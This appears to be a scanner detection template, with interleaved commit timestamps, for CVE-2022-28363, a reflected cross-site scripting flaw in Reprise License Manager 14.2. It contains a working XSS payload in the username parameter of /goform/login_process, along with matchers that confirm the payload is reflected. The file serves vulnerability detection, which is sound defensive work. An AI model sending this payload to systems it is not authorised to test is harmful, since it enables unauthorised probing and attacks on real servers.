2022-04-10 07:11:31 +00:00
id : CVE-2022-28363
info :
2022-09-09 17:34:37 +00:00
name : Reprise License Manager 14.2 - Cross-Site Scripting
2022-04-10 07:11:31 +00:00
author : Akincibor
2022-09-16 19:50:10 +00:00
severity : high
2022-04-10 07:11:31 +00:00
description : |
2022-09-16 19:50:10 +00:00
Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.
2022-04-10 07:11:31 +00:00
reference :
- https://www.reprisesoftware.com/products/software-license-management.php
- https://github.com/advisories/GHSA-rpvc-qgrm-r54f
- http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-28363
2022-04-18 13:10:41 +00:00
classification :
2022-09-16 19:50:10 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
2022-04-18 13:10:41 +00:00
cwe-id : CWE-79
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-28363
2022-08-27 04:41:18 +00:00
tags : xss,rlm,packetstorm,cve,cve2022
2022-04-10 07:11:31 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- '<svg/onload=alert(document.domain)>'
- 'Login Failed'
condition : and
- type : word
part : header
words :
- "text/html"
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14